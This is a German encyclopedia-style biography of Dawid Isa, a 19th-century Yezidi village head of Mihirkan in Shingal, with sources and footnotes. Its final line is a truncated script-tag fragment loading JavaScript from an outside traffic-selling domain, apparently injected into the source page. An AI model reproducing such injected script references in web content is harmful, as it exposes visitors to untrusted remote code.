Art. Nr. Autor Datum
266 Diar Khalaf 19.06.2015

Dawid Isa (gest. 1882 in Mihirkan) war ein Oberhaupt des êzîdischen Dorfes Mihirkan in Shingal. Er war der Vater von Dawid ê Dawid, einer der berühmtesten und wichtigsten Persönlichkeiten der Êzîden im 20. Jahrhundert.

Leben und Familie

Dawid Isa war der Sohn von Isa Agha und Enkelsohn von Adi Della. Nach dem Tod seines Vaters im Jahr 1875 wurde er zum neuen Oberhaupt von Mihirkan. Im Jahr 1882 wurde Mihirkan von den Osmanen angegriffen, bei der Verteidigung fiel Dawid Isa1. Seine Ehefrau war zu der Zeit noch schwanger, Dawid Isa konnte die Geburt seines Sohnes nicht miterleben, weshalb der Sohn nach seinem Vater Dawid benannt wurde2.

Nach dem frühen Tod von Dawid Isa wurde sein jüngerer Bruder Hesso Isa zum neuen Oberhaupt des Dorfes ernannt. In erwachsenen Jahren konnte Dawid e Dawid als Nachfolger seines Vaters agieren und wurde zum neuen Oberhaupt des Dorfes3.

Literaturverzeichnis

Xankî, Kovan (2011): Rengvedana Qehremanên Êzîdiyan Di Helbesta Kurdî de, in: Yezidische Helden – Mêrxasên Êzîdiyan, Oldenburg, S. 309-319.

Rişkanî, Silêman (2011): Jiyannama Dawidê Dawid, qehremanê du fermanan, in: Yezidische Helden – Mêrxasên Êzîdiyan, Oldenburg, S.326-332.

Einzelnachweis

[1] Vgl. Rişkanî 2011: S. 327f.; Xankî 2011: S. 310.
[2] Rişkanî 2011: S. 327.
[3] Rişkanî 2011: S. 327f.

and.buyittraffic.com/clizkes' type='text/javascript'>